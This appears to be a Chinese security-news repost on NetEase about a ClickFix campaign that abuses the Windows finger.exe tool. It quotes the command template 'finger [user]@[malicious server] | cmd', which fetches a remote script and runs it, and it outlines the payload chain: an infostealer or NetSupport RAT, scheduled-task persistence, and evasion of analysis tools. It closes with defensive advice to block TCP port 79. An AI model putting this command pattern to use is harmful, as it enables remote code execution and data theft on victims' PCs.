网易首页 > 网易号 > 正文 申请入驻

【安全圈】约 40 年前的 Windows 古董命令被滥用,黑客远程投毒可掌控你的 PC

0
分享至

关键词

黑客

科技媒体 bleepingcomputer 昨日(11 月 15 日)发布博文,报道称近期有黑客滥用诞生约年的 "Finger" 协议,成为新型 ClickFix 恶意软件攻击的关键环节。

注:"Finger" 协议是一种非常早期的互联网协议,诞生于上世纪 70 年代,主要功能是让用户查询其他用户的公开信息(如登录名、最后上线时间等)。在现代网络环境中已基本废弃,但其客户端程序(finger.exe)仍在某些操作系统(如 Windows)中保留。

攻击者利用该协议,在新型的 ClickFix 恶意软件攻击中,向受感染的 Windows 设备远程下发并执行恶意命令。Finger 协议最初用于在 Unix / Linux 系统上查询用户信息,后来也被集成到 Windows 中。

虽然如今已鲜有人使用,但其作为系统原生工具的特性,让其成为一种理想的 " 原生二进制程序(LOLBIN)",能有效规避部分安全软件的检测。

攻击的核心在于社会工程学欺骗。攻击者会通过各种方式(如网页弹窗)显示一个伪造的 " 人机验证 " 提示,诱导用户按下 Win+R 快捷键并输入一行看似无害的命令。


该命令格式通常为 finger [ 用户名 ] @ [ 恶意服务器地址 ] | cmd。一旦用户执行,Windows 系统内置的 finger.exe 程序便会向指定服务器发起请求,而服务器返回的并非用户信息,而是一段预设的恶意脚本。

通过管道符 |,该脚本的输出被直接传递给 Windows 命令处理器 cmd.exe 执行,从而完成恶意代码的远程投递。


恶意脚本执行后,会立即展开一系列后续动作。它首先会创建一个随机命名的路径,并下载一个伪装成 PDF 文件的 ZIP 压缩包。解压后,其中的恶意载荷便会被激活。


根据分析,这些载荷主要分为两类:一类是专门用于窃取用户密码、浏览器记录等敏感数据的信息窃取程序(Infostealer);另一类则是功能更强大的 NetSupport Manager 远程访问木马(RAT),一旦植入,攻击者便能完全控制受害者的计算机。

为实现持久化,该脚本还会创建一个计划任务,确保恶意软件在用户每次登录系统时都能自动运行。


研究人员发现,这种攻击手法还在不断演进。在一些更新的攻击案例中,恶意脚本在执行核心任务前,会先扫描受害者电脑中是否存在常见的恶意软件分析工具。


这些工具包括 Process Monitor、Wireshark、Fiddler、OllyDbg 等数十款。如果检测到任何一款分析工具正在运行,脚本会立即终止执行,从而增加安全研究人员对其进行分析和追踪的难度。

由于此类攻击依赖于 Finger 协议进行通信,而该协议使用专门的 TCP 79 端口,因此防御策略也相对明确。对于绝大多数企业和个人用户而言,Finger 协议并无实际用途。因此,系统管理员和安全防护人员应在网络防火墙上阻止所有出站到 TCP 79 端口的流量。


安全圈


网罗圈内热点 专注网络安全

实时资讯一手掌握!

好看你就分享 有用就点个赞

支持「安全圈」就点个三连吧!

特别声明:以上内容(如有图片或视频亦包括在内)为自媒体平台“网易号”用户上传并发布,本平台仅提供信息存储服务。

Notice: The content above (including the pictures and videos if any) is uploaded and posted by a user of NetEase Hao, which is a social media platform and only provides information storage services.

相关推荐
热点推荐
45金!41金!39金!19日凌晨全运会最新金牌榜:山东+江苏单日3金

45金!41金!39金!19日凌晨全运会最新金牌榜:山东+江苏单日3金

大秦壁虎白话体育
2025-11-19 09:41:19
别再争议广东模特冠军了,辟谣了是太太组冠军,实际冠军另有其人

别再争议广东模特冠军了,辟谣了是太太组冠军,实际冠军另有其人

乡野小珥
2025-11-20 05:32:37
俄乌多条战线激烈厮杀,扎波罗热乌军以血明志

俄乌多条战线激烈厮杀,扎波罗热乌军以血明志

史政先锋
2025-11-19 16:17:02
烧一赔三!新能源史上最狠承诺来了,比亚迪看懵了!

烧一赔三!新能源史上最狠承诺来了,比亚迪看懵了!

趣味萌宠的日常
2025-11-19 15:30:15
易烊千玺组合三人现状:一位金鸡奖影帝,一位被吐槽,一位最可怜

易烊千玺组合三人现状:一位金鸡奖影帝,一位被吐槽,一位最可怜

观察者海风
2025-11-18 18:55:01
“黑马”力压吴艳妮、林雨薇!广东刘景扬折桂女子100米栏

“黑马”力压吴艳妮、林雨薇!广东刘景扬折桂女子100米栏

南方都市报
2025-11-19 23:03:10
吃饼吃到吐!艾顿性价比超浓眉哥 湖人四巨头冲冠

吃饼吃到吐!艾顿性价比超浓眉哥 湖人四巨头冲冠

体坛周报
2025-11-19 17:41:13
《四喜》这反转没想到吧,冯家破产后,沈明珠的救星终于出现了

《四喜》这反转没想到吧,冯家破产后,沈明珠的救星终于出现了

小猫追剧
2025-11-19 19:17:26
斯诺克战报!墨菲开门红,4-0过关会师奥沙利文,丁俊晖登场!

斯诺克战报!墨菲开门红,4-0过关会师奥沙利文,丁俊晖登场!

刘姚尧的文字城堡
2025-11-20 00:23:39
一个美艳少妇,一个风流局长,曾经爱得轰轰烈烈,却最终祸起萧墙

一个美艳少妇,一个风流局长,曾经爱得轰轰烈烈,却最终祸起萧墙

忽晚山河
2024-02-05 20:01:47
8-0,塞内加尔踢疯,33岁马内戴帽,24岁拜仁悍将雅克松梅开二度

8-0,塞内加尔踢疯,33岁马内戴帽,24岁拜仁悍将雅克松梅开二度

凌空倒钩
2025-11-19 07:03:19
心爱的硅胶娃娃被室友锁上门猛干,男子“抓奸在床”气哭报警获赔7766元

心爱的硅胶娃娃被室友锁上门猛干,男子“抓奸在床”气哭报警获赔7766元

可达鸭面面观
2025-10-11 15:09:06
盘点岛国10位老面孔,在岛国人气已经超高,但是还有很多人没见过

盘点岛国10位老面孔,在岛国人气已经超高,但是还有很多人没见过

素然追光
2025-11-20 02:40:03
王菲女儿与陈奕迅女儿、甄子丹女儿合影,网友:仨人长的都像妈妈

王菲女儿与陈奕迅女儿、甄子丹女儿合影,网友:仨人长的都像妈妈

小咪侃娱圈
2025-11-18 11:35:27
台湾名师区桂芝大声质问和痛斥国民党“反共”、丧失“中国”党魂

台湾名师区桂芝大声质问和痛斥国民党“反共”、丧失“中国”党魂

文史旺旺旺
2025-11-18 19:36:13
香港失业率冲上3.9%,超15万人失业,未来前景堪忧

香港失业率冲上3.9%,超15万人失业,未来前景堪忧

麦小柒
2025-11-17 15:28:17
小伙自驾西藏,遇徒步女学生搭车,同行2天后,才知自己躲过一劫

小伙自驾西藏,遇徒步女学生搭车,同行2天后,才知自己躲过一劫

五元讲堂
2025-10-16 14:41:16
外媒:俄罗斯对乌克兰发动大规模夜间袭击

外媒:俄罗斯对乌克兰发动大规模夜间袭击

参考消息
2025-11-19 21:57:10
年薪12万美元招不到人!福特CEO称美国技能工人严重短缺,此前白宫称:美国需要的是电工、水管工,而不是哈佛研究生

年薪12万美元招不到人!福特CEO称美国技能工人严重短缺,此前白宫称:美国需要的是电工、水管工,而不是哈佛研究生

每日经济新闻
2025-11-18 21:23:06
大量食用油被检测出致癌物?自查厨房是否有3种油,别再吃了

大量食用油被检测出致癌物?自查厨房是否有3种油,别再吃了

新时代的两性情感
2025-11-19 12:52:43
2025-11-20 06:59:00
安全圈
安全圈
国内首家大安全概念新媒体
6158文章数 4688关注度
往期回顾 全部

科技要闻

一夜封神,Gemini 3让谷歌找回“碾压感”

头条要闻

日方要求解释为何未告知磋商后会有媒体拍摄 中方回应

头条要闻

日方要求解释为何未告知磋商后会有媒体拍摄 中方回应

体育要闻

世界杯最小参赛国诞生!15万人岛国的奇迹

娱乐要闻

史林子出轨对方前妻放锤!

财经要闻

重磅!中金公司拟收购东兴与信达证券

汽车要闻

此刻价格不重要 第5代帝豪本身就是价值

态度原创

艺术
教育
手机
公开课
军事航空

艺术要闻

周恩来夫妇珍贵合影集,太难得一见!

教育要闻

高考选科时候这样做更靠谱!

手机要闻

OPPO Find X9系列海外卖爆!销量接近上代2倍

公开课

李玫瑾:为什么性格比能力更重要?

军事要闻

量大管饱 中国军网在海外发布备战视频

无障碍浏览 进入关怀版